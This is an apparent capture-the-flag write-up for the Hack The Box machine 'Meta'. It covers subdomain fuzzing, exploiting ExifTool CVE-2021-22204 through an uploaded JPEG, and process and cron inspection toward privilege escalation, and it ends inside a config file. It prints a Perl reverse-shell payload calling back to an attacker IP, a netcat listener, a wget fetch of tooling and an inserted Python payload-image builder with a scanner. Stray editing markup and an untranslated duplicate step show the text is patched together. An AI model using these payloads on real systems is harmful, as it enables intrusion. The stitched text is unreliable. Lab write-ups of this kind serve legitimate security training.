Meta-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: subdomain (virtual host) enumeration, CVE-2021-22204 (ExifTool), using pspy, sh script analysis, the ImageMagick 7.0.10-36 vulnerability (CVE-2020-29599), privilege escalation through the XDG_CONFIG_HOME environment variable

Reference: https://0xdf.gitlab.io/2022/06/11/htb-meta.html

Reference: https://siunam321.github.io/ctf/hackthebox/Meta/

0x01 Getting a user shell

1. Target IP: 10.10.11.140

2. Scan the open ports.

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p 22,80 -sCV 10.10.11.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-30 11:02 CST
Nmap scan report for 10.10.11.140
Host is up (0.40s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
| 256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_ 256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.09 seconds

3. The scan leaked a hostname (the redirect to http://artcorp.htb), so next fuzz the Host header for virtual hosts under that domain. `-fs 0` hides the empty response that every non-existent vhost returns.

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://10.10.11.140 -H "Host: FUZZ.artcorp.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.10.11.140
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.artcorp.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________

dev01 [Status: 200, Size: 247, Words: 16, Lines: 10, Duration: 349ms]
:: Progress: [4989/4989] :: Job [1/1] :: 29 req/sec :: Duration: [0:01:12] :: Errors: 1 ::

4. Map both hostnames to the target in /etc/hosts.

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.140 artcorp.htb dev01.artcorp.htb" | sudo tee -a /etc/hosts
10.10.11.140 artcorp.htb dev01.artcorp.htb

5. Look at the site on port 80.

http://artcorp.htb/

6. Directory brute-forcing on the main vhost turns up nothing of interest.

┌──(kali㉿offsec)-[~/Desktop]
└─$ feroxbuster -u http://artcorp.htb

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://artcorp.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 7l 20w 199c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 7l 23w 196c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 20w 234c http://artcorp.htb/assets => http://artcorp.htb/assets/
301 GET 7l 20w 238c http://artcorp.htb/assets/img => http://artcorp.htb/assets/img/
[####################] - 7m 90006/90006 0s found:2 errors:732
[####################] - 6m 30000/30000 77/s http://artcorp.htb/
[####################] - 6m 30000/30000 78/s http://artcorp.htb/assets/
[####################] - 6m 30000/30000 82/s http://artcorp.htb/assets/img/

7. Move on to the dev01 subdomain.

http://dev01.artcorp.htb/

8. Brute-force directories there as well, this time also trying the .php extension.

┌──(kali㉿offsec)-[~/Desktop]
└─$ feroxbuster -u http://dev01.artcorp.htb -x php

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://dev01.artcorp.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 7l 20w 199c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 7l 23w 196c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 9l 24w 247c http://dev01.artcorp.htb/
301 GET 7l 20w 242c http://dev01.artcorp.htb/metaview => http://dev01.artcorp.htb/metaview/
301 GET 7l 20w 246c http://dev01.artcorp.htb/metaview/css => http://dev01.artcorp.htb/metaview/css/
200 GET 9l 24w 247c http://dev01.artcorp.htb/index.php
301 GET 7l 20w 249c http://dev01.artcorp.htb/metaview/assets => http://dev01.artcorp.htb/metaview/assets/
301 GET 7l 20w 246c http://dev01.artcorp.htb/metaview/lib => http://dev01.artcorp.htb/metaview/lib/
301 GET 7l 20w 250c http://dev01.artcorp.htb/metaview/uploads => http://dev01.artcorp.htb/metaview/uploads/
200 GET 33l 83w 1404c http://dev01.artcorp.htb/metaview/index.php
200 GET 0l 0w 155713c http://dev01.artcorp.htb/metaview/css/bootstrap.min.css
301 GET 7l 20w 249c http://dev01.artcorp.htb/metaview/vendor => http://dev01.artcorp.htb/metaview/vendor/

9. This reveals a /metaview/ directory; open it.

http://dev01.artcorp.htb/metaview/

10. It looks like an image upload form that analyses the uploaded picture. Upload an image and see what comes back.
</gre_replace>
<gr_replace lines="270" cat="clarify" orig="11、">
11. The page prints a set of metadata fields. From experience this looks like exiftool output, so run exiftool locally on the same image and compare.

http://dev01.artcorp.htb/metaview/index.php

11、我们发现了出现了一些信息,以往的经验来看,这个应该是使用了exiftool工具进行显示的信息,我们本地用呢个工具比对下看看

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool ./bg-showcase-2.jpg
ExifTool Version Number : 12.70
File Name : bg-showcase-2.jpg
Directory : .
File Size : 197 kB
File Modification Date/Time : 2024:01:30 11:24:37+08:00
File Access Date/Time : 2024:01:30 11:24:37+08:00
File Inode Change Date/Time : 2024:01:30 11:24:37+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
Quality : 100%
XMP Toolkit : Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21
Document ID : xmp.did:391792B7C1AC11E79FC6E0171011BB04
Instance ID : xmp.iid:391792B6C1AC11E79FC6E0171011BB04
Creator Tool : Adobe Photoshop CC 2018 Macintosh
Derived From Instance ID : 30005BFC1BB16784324B782F5C8D8E08
Derived From Document ID : 30005BFC1BB16784324B782F5C8D8E08
DCT Encode Version : 100
APP14 Flags 0 : [14], Encoded with Blend=1 downsampling
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 900
Image Height : 600
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 900x600
Megapixels : 0.540

12. The fields match, so the backend is most likely ExifTool. Check for known vulnerabilities.

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit exiftool
------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------- ---------------------------------
ExifTool 12.23 - Arbitrary Code Execution | linux/local/50911.py
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m linux/local/50911.py
Exploit: ExifTool 12.23 - Arbitrary Code Execution
URL: https://www.exploit-db.com/exploits/50911
Path: /usr/share/exploitdb/exploits/linux/local/50911.py
Codes: CVE-2021-22204
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/50911.py

13. The Exploit-DB script has problems generating the image, so use an equivalent exploit from GitHub (UNICORDev) to build the payload image instead. Background on the bug: CVE-2021-22204 affects ExifTool 7.44 through 12.23 (fixed in 12.24); its DjVu annotation parser runs C-style escape sequences through Perl eval, which is why the payload below is a Perl expression embedded in a `(metadata ...)` string.

https://hackerone.com/reports/1154542

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

https://github.com/UNICORDev/exploit-CVE-2021-22204

┌──(kali㉿offsec)-[~/Desktop/exploit-CVE-2021-22204-main]
└─$ ls -la
total 28
drwx------ 2 kali kali 4096 Jun  8  2022 .
drwxr-xr-x 5 kali kali 4096 Jan 30 11:46 ..
-rw-r--r-- 1 kali kali  481 Jun  8  2022 Dockerfile
-rw-r--r-- 1 kali kali 6802 Jun  8  2022 exploit-CVE-2021-22204.py
-rw-r--r-- 1 kali kali   85 Jun  8  2022 .gitignore
-rw-r--r-- 1 kali kali 2725 Jun  8  2022 README.md

┌──(kali㉿offsec)-[~/Desktop/exploit-CVE-2021-22204-main]
└─$ sudo python exploit-CVE-2021-22204.py -c 'id'

_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....

UNICORD: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
PAYLOAD: (metadata "\c${system('id')};")
DEPENDS: Dependencies for exploit are met!
PREPARE: Payload written to file!
PREPARE: Payload file compressed!
PREPARE: DjVu file created!
PREPARE: JPEG image created/processed!
PREPARE: Exiftool config written to file!
EXPLOIT: Payload injected into image!
CLEANUP: Old file artifacts deleted!
SUCCESS: Exploit image written to "image.jpg"

14. Upload the generated image.jpg through the metaview form and check whether the command runs. The `id` output appears at the top of the metadata listing, and the "DjVu Version" line shows that ExifTool parsed the DjVu blob hidden inside the JPEG.

http://dev01.artcorp.htb/metaview/index.php

uid=33(www-data) gid=33(www-data) groups=33(www-data)
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Exif Byte Order : Big-endian (Motorola, MM)
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Y Cb Cr Positioning : Centered
DjVu Version : 0.24
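What the exploit tool did above, and what a defender can look for, as an added example that is not part of the original writeup and not the UNICORD/devcraft code: CVE-2021-22204 lives in ExifTool's DjVu annotation parser (versions 7.44 through 12.23, fixed in 12.24). The parser unescapes C-style backslash sequences inside quoted annotation strings by handing them to Perl's eval, so an annotation containing `\c${...}` runs whatever Perl is inside the braces. The tool therefore builds a tiny DjVu file whose ANTa (annotation) chunk holds the `(metadata "...")` string printed in its output, then smuggles that file into a JPEG's EXIF through a custom exiftool config, which is why ExifTool reported "DjVu Version : 0.24" for an uploaded JPEG. The block below builds that container by hand with only the standard library, wraps it in a minimal JPEG, and parses both back to flag the dangerous annotation. The PAYLOAD string is the one from step 13; the INFO field values, helper names, the EXIF tag choice and the SUSPICIOUS heuristic are this example's own assumptions.

```python
import re
import struct

MAGIC = b"AT&T"                                   # every DjVu file starts with this, then "FORM"
PAYLOAD = '(metadata "\\c${system(\'id\')};")'    # the exact annotation the writeup's tool injected


def _chunk(cid: bytes, data: bytes) -> bytes:
    """IFF85-style chunk: 4-byte id, big-endian u32 length, data, padded to an even length."""
    assert len(cid) == 4
    out = cid + struct.pack(">I", len(data)) + data
    return out + b"\x00" if len(data) % 2 else out


def info_chunk(width: int = 1, height: int = 1, dpi: int = 100) -> bytes:
    """INFO chunk: width/height (BE u16), two version bytes, dpi (LE u16), gamma, flags.
    The version bytes (24, 0) are what ExifTool printed as 'DjVu Version : 0.24' above."""
    return _chunk(b"INFO", struct.pack(">HHBB", width, height, 24, 0)
                  + struct.pack("<H", dpi) + bytes([22, 0]))


def build_djvu(annotation: str) -> bytes:
    """Single-page DjVu whose only content is an uncompressed ANTa annotation chunk,
    i.e. what `djvumake out.djvu INFO=1,1 ANTa=payload` produces, built by hand."""
    form = b"DJVU" + info_chunk() + _chunk(b"ANTa", annotation.encode())
    return MAGIC + _chunk(b"FORM", form)


def wrap_in_jpeg_exif(djvu: bytes, tag: int = 0xC51B) -> bytes:
    """Minimal JPEG (SOI, one APP1/Exif segment, EOI) whose IFD0 carries `djvu` in an
    UNDEFINED-typed tag. 0xC51B (HasselbladExif) is the tag the public config-based
    exploits use; that detail is an assumption here, the writeup only shows a config
    being written and the payload 'injected into image'."""
    ifd_off = 8
    data_off = ifd_off + 2 + 12 + 4               # entry count, one entry, next-IFD pointer
    tiff = (b"MM\x00\x2a" + struct.pack(">I", ifd_off)
            + struct.pack(">H", 1)
            + struct.pack(">HHII", tag, 7, len(djvu), data_off)
            + struct.pack(">I", 0) + djvu)
    app1 = b"Exif\x00\x00" + tiff
    assert len(app1) + 2 <= 0xFFFF, "payload does not fit in one APP1 segment"
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def iter_chunks(blob: bytes, off: int):
    """Yield (id, data) for consecutive IFF chunks starting at `off`."""
    while off + 8 <= len(blob):
        cid = blob[off:off + 4]
        (n,) = struct.unpack(">I", blob[off + 4:off + 8])
        yield cid, blob[off + 8:off + 8 + n]
        off += 8 + n + (n & 1)


def parse_djvu(blob: bytes, start: int = 0) -> dict:
    """Return {chunk_id: data} for the DjVu container that begins at `start`."""
    if blob[start:start + 8] != MAGIC + b"FORM":
        raise ValueError("no DjVu container at offset %d" % start)
    (form_len,) = struct.unpack(">I", blob[start + 8:start + 12])
    form = blob[start + 12:start + 12 + form_len]
    if form[:4] != b"DJVU":
        raise ValueError("unsupported FORM type %r" % form[:4])
    return dict(iter_chunks(form, 4))


# ExifTool 7.44-12.23 ran C-style escapes inside quoted annotation strings through Perl
# eval, so "\c${...}" interpolates an arbitrary Perl block.  Flag that shape plus the
# usual call names; this is a triage heuristic, not a Perl parser.
SUSPICIOUS = re.compile(r"\\[a-zA-Z]?\$\{|\bsystem\s*\(|\bexec\s*\(|\bopen\s*\(")


def scan(blob: bytes) -> list:
    """Locate every DjVu container in `blob` (a bare .djvu, or one hidden in a JPEG's
    EXIF) and report its annotation chunks as (chunk_id, text, suspicious).  ANTz
    chunks are BZZ-compressed; without a BZZ decoder we can only report their presence."""
    findings = []
    start = blob.find(MAGIC + b"FORM")
    while start != -1:
        try:
            chunks = parse_djvu(blob, start)
        except ValueError:
            chunks = {}
        for cid, data in chunks.items():
            if cid == b"ANTa":
                text = data.decode("latin-1")
                findings.append(("ANTa", text, bool(SUSPICIOUS.search(text))))
            elif cid == b"ANTz":
                findings.append(("ANTz", None, None))
        start = blob.find(MAGIC + b"FORM", start + 1)
    return findings


if __name__ == "__main__":
    evil = wrap_in_jpeg_exif(build_djvu(PAYLOAD))
    for hit in scan(evil):
        print(hit)
```

Run it as a script to see the finding for the constructed image; `scan()` works on real uploads too. For a defender the reliable fix is ExifTool 12.24 or later (or not exposing uploads to ExifTool at all) rather than pattern matching: an attacker can put the annotation in a BZZ-compressed ANTz chunk, which this scanner can only report, not inspect.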

15. The `id` output came back in the response, so the upload path is vulnerable. Build a reverse-shell payload next.

┌──(kali㉿offsec)-[~/Desktop/exploit-CVE-2021-22204-main]
└─$ sudo python exploit-CVE-2021-22204.py -s 10.10.14.4 443
[sudo] password for kali:

_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....

UNICORD: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
PAYLOAD: (metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(443,inet_aton('10.10.14.4')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};")
DEPENDS: Dependencies for exploit are met!
PREPARE: Payload written to file!
PREPARE: Payload file compressed!
PREPARE: DjVu file created!
PREPARE: JPEG image created/processed!
PREPARE: Exiftool config written to file!
EXPLOIT: Payload injected into image!
CLEANUP: Old file artifacts deleted!
SUCCESS: Exploit image written to "image.jpg"

16. Start a listener on the port the payload connects to, upload the new image.jpg and catch the shell.

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.140] 39632
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

17. Upgrade to a fully interactive TTY.

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.140] 39634
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ script /dev/null -c bash
Script started, file is /dev/null
www-data@meta:/var/www/dev01.artcorp.htb/metaview$ ^Z
zsh: suspended nc -lvnp 443

┌──(kali㉿offsec)-[~/Desktop]
└─$ stty raw -echo; fg
[1] + continued nc -lvnp 443
reset
reset: unknown terminal type unknown
Terminal type? screen

www-data@meta:/var/www/dev01.artcorp.htb/metaview$

18. Check /home for users and whether user.txt can be read directly as www-data.

www-data@meta:/var/www/dev01.artcorp.htb/metaview$ ls -la /home/
total 12
drwxr-xr-x 3 root root 4096 Aug 29 2021 .
drwxr-xr-x 18 root root 4096 Aug 29 2021 ..
drwxr-xr-x 4 thomas thomas 4096 Jan 17 2022 thomas
www-data@meta:/var/www/dev01.artcorp.htb/metaview$ ls -la /home/thomas/
total 32
drwxr-xr-x 4 thomas thomas 4096 Jan 17 2022 .
drwxr-xr-x 3 root root 4096 Aug 29 2021 ..
lrwxrwxrwx 1 root root 9 Aug 29 2021 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas 220 Aug 29 2021 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 Aug 29 2021 .bashrc
drwxr-xr-x 3 thomas thomas 4096 Aug 30 2021 .config
-rw-r--r-- 1 thomas thomas 807 Aug 29 2021 .profile
drwx------ 2 thomas thomas 4096 Jan 4 2022 .ssh
-rw-r----- 1 root thomas 33 Jan 29 21:54 user.txt
www-data@meta:/var/www/dev01.artcorp.htb/metaview$

19. user.txt is owned by root:thomas with mode 640, so www-data cannot read it; we need to become thomas. Since this is a medium box, digging through web configs (the easy-box routine) is unlikely to be the way in, so upload pspy and watch for suspicious processes. Note that /tmp is empty when we arrive.

www-data@meta:/var/www/dev01.artcorp.htb/metaview$ cd /tmp
www-data@meta:/tmp$ ls
www-data@meta:/tmp$
www-data@meta:/tmp$ uname -a
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
www-data@meta:/tmp$

┌──(kali㉿offsec)-[~/Desktop/tools/pspy]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.140 - - [30/Jan/2024 14:14:25] "GET /pspy64 HTTP/1.1" 200 -

www-data@meta:/tmp$ wget http://10.10.14.4/pspy64
--2024-01-30 01:14:24-- http://10.10.14.4/pspy64
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64'

pspy64 100%[===================>] 2.96M 617KB/s in 5.7s

2024-01-30 01:14:30 (533 KB/s) - 'pspy64' saved [3104768/3104768]

www-data@meta:/tmp$ ls
pspy64

20. Run it and watch the process list for a couple of minutes.

www-data@meta:/tmp$ chmod +x pspy64 
www-data@meta:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/01/30 01:15:27 CMD: UID=33 PID=4158 | ./pspy64
2024/01/30 01:15:27 CMD: UID=0 PID=4066 |
2024/01/30 01:15:27 CMD: UID=33 PID=3965 | bash
2024/01/30 01:15:27 CMD: UID=33 PID=3964 | sh -c bash
2024/01/30 01:15:27 CMD: UID=33 PID=3963 | script /dev/null -c bash
2024/01/30 01:15:27 CMD: UID=33 PID=3961 | /bin/sh -i
2024/01/30 01:15:27 CMD: UID=33 PID=3960 | sh -c exiftool '/var/www/dev01.artcorp.htb/metaview/uploads/phphA3LxI.jpg' --system:all --exiftool:all -e
2024/01/30 01:15:27 CMD: UID=0 PID=3672 |
2024/01/30 01:15:27 CMD: UID=0 PID=3163 |
2024/01/30 01:15:27 CMD: UID=33 PID=2235 | /bin/bash
2024/01/30 01:15:27 CMD: UID=33 PID=2234 | python3 -c import pty; pty.spawn("/bin/bash")
2024/01/30 01:15:27 CMD: UID=33 PID=2224 | /bin/sh -i
2024/01/30 01:15:27 CMD: UID=33 PID=2223 | sh -c exiftool '/var/www/dev01.artcorp.htb/metaview/uploads/php4CuAkX.jpg' --system:all --exiftool:all -e
2024/01/30 01:15:27 CMD: UID=33 PID=1746 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=33 PID=1716 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=33 PID=1715 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=33 PID=1707 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=33 PID=1692 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=33 PID=1571 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=33 PID=1539 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=33 PID=1469 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=33 PID=1466 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=33 PID=1254 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=0 PID=622 | /usr/sbin/apache2 -k start
2024/01/30 01:15:27 CMD: UID=0 PID=613 | /usr/sbin/sshd -D
2024/01/30 01:15:27 CMD: UID=0 PID=603 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2024/01/30 01:15:27 CMD: UID=0 PID=430 | /lib/systemd/systemd-logind
2024/01/30 01:15:27 CMD: UID=0 PID=429 |
2024/01/30 01:15:27 CMD: UID=0 PID=426 | /usr/sbin/rsyslogd -n -iNONE
2024/01/30 01:15:27 CMD: UID=104 PID=424 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2024/01/30 01:15:27 CMD: UID=0 PID=419 | /usr/sbin/cron -f
2024/01/30 01:15:27 CMD: UID=0 PID=412 | /usr/bin/vmtoolsd
2024/01/30 01:15:27 CMD: UID=0 PID=403 |
2024/01/30 01:15:27 CMD: UID=0 PID=402 |
2024/01/30 01:15:27 CMD: UID=101 PID=392 | /lib/systemd/systemd-timesyncd
2024/01/30 01:15:27 CMD: UID=0 PID=391 | /usr/bin/VGAuthService
2024/01/30 01:15:27 CMD: UID=0 PID=364 | /lib/systemd/systemd-udevd
2024/01/30 01:15:27 CMD: UID=0 PID=362 |
2024/01/30 01:15:27 CMD: UID=0 PID=347 | /lib/systemd/systemd-journald
2024/01/30 01:15:27 CMD: UID=0 PID=313 |
2024/01/30 01:15:27 CMD: UID=0 PID=1 | /sbin/init
2024/01/30 01:15:27 CMD: UID=0 PID=4166 |
2024/01/30 01:16:01 CMD: UID=0 PID=4169 | /usr/sbin/CRON -f
2024/01/30 01:16:01 CMD: UID=0 PID=4168 | /usr/sbin/cron -f
2024/01/30 01:16:01 CMD: UID=0 PID=4167 | /usr/sbin/CRON -f
2024/01/30 01:16:02 CMD: UID=0 PID=4170 | /usr/sbin/CRON -f
2024/01/30 01:16:02 CMD: UID=0 PID=4171 | /usr/sbin/CRON -f
2024/01/30 01:16:02 CMD: UID=0 PID=4172 | /bin/sh -c rm /tmp/*
2024/01/30 01:16:02 CMD: UID=0 PID=4174 | /usr/sbin/CRON -f
2024/01/30 01:16:02 CMD: UID=0 PID=4173 | cp -rp /root/conf/config_neofetch.conf /home/thomas/.config/neofetch/config.conf
2024/01/30 01:16:02 CMD: UID=1000 PID=4175 | /bin/bash /usr/local/bin/convert_images.sh
2024/01/30 01:16:02 CMD: UID=1000 PID=4176 | /bin/bash /usr/local/bin/convert_images.sh
2024/01/30 01:16:02 CMD: UID=1000 PID=4177 | /bin/bash /usr/local/bin/convert_images.sh
2024/01/30 01:17:01 CMD: UID=0 PID=4180 | /usr/sbin/CRON -f
2024/01/30 01:17:01 CMD: UID=0 PID=4179 | /usr/sbin/CRON -f
2024/01/30 01:17:01 CMD: UID=0 PID=4178 | /usr/sbin/cron -f
2024/01/30 01:17:01 CMD: UID=0 PID=4182 | /usr/sbin/CRON -f
2024/01/30 01:17:01 CMD: UID=1000 PID=4183 | /bin/sh -c /usr/local/bin/convert_images.sh
2024/01/30 01:17:01 CMD: UID=0 PID=4184 | /usr/sbin/CRON -f
2024/01/30 01:17:01 CMD: UID=0 PID=4185 | /usr/sbin/CRON -f
2024/01/30 01:17:01 CMD: UID=1000 PID=4186 | /bin/bash /usr/local/bin/convert_images.sh
2024/01/30 01:17:01 CMD: UID=0 PID=4188 | /bin/sh -c rm /tmp/*
2024/01/30 01:17:01 CMD: UID=1000 PID=4187 | pkill mogrify
2024/01/30 01:17:01 CMD: UID=0 PID=4189 | /bin/sh -c cd / && run-parts --report /etc/cron.hourly

21. Two cron-driven activities stand out. Every minute root runs `rm /tmp/*` (so anything dropped in /tmp, including the pspy64 binary, is deleted) and copies /root/conf/config_neofetch.conf over /home/thomas/.config/neofetch/config.conf, and thomas (UID 1000) runs /usr/local/bin/convert_images.sh followed by `pkill mogrify`. Look at the script and the config.

www-data@meta:/tmp$ 
www-data@meta:/tmp$ ls -la /usr/local/bin/convert_images.sh
-rwxr-xr-x 1 root root 126 Jan 3 2022 /usr/local/bin/convert_images.sh
www-data@meta:/tmp$ ls -la /home/thomas/.config/neofetch/config.conf
-rw-r--r-- 1 thomas thomas 14591 Aug 30 2021 /home/thomas/.config/neofetch/config.conf
www-data@meta:/tmp$

www-data@meta:/tmp$ cat /home/thomas/.config/neofetch/config.conf
# See this wiki page for more info:
# https://github.com/dylanaraps/neofetch/wiki/Customizing-Info
print_info() {
info title
info underline

info "OS" distro
info "Host" model
info "Kernel" kernel
info "Uptime" uptime
info "Packages" packages
info "Shell" shell
info "Resolution" resolution
info "DE" de
info "WM" wm
info "WM Theme" wm_theme
info "Theme" theme
info "Icons" icons
info "Terminal" term
info "Terminal Font" term_font
info "CPU" cpu
info "GPU" gpu
info "Memory" memory

# info "GPU Driver" gpu_driver # Linux/macOS only
# info "CPU Usage" cpu_usage
# info "Disk" disk
# info "Battery" battery
# info "Font" font
# info "Song" song
# [[ $player ]] && prin "Music Player" "$player"
# info "Local IP" local_ip
# info "Public IP" public_ip
# info "Users" users
# info "Locale" locale # This only works on glibc systems.

info cols
}


# Kernel


# Shorten the output of the kernel function.
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --kernel_shorthand
# Supports: Everything except *BSDs (except PacBSD and PC-BSD)
#
# Example:
# on: '4.8.9-1-ARCH'
# off: 'Linux 4.8.9-1-ARCH'
kernel_shorthand="on"


# Distro


# Shorten the output of the distro function
#
# Default: 'off'
# Values: 'on', 'off', 'tiny'
# Flag: --distro_shorthand
# Supports: Everything except Windows and Haiku
distro_shorthand="off"

# Show/Hide OS Architecture.
# Show 'x86_64', 'x86' and etc in 'Distro:' output.
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --os_arch
#
# Example:
# on: 'Arch Linux x86_64'
# off: 'Arch Linux'
os_arch="on"


# Uptime


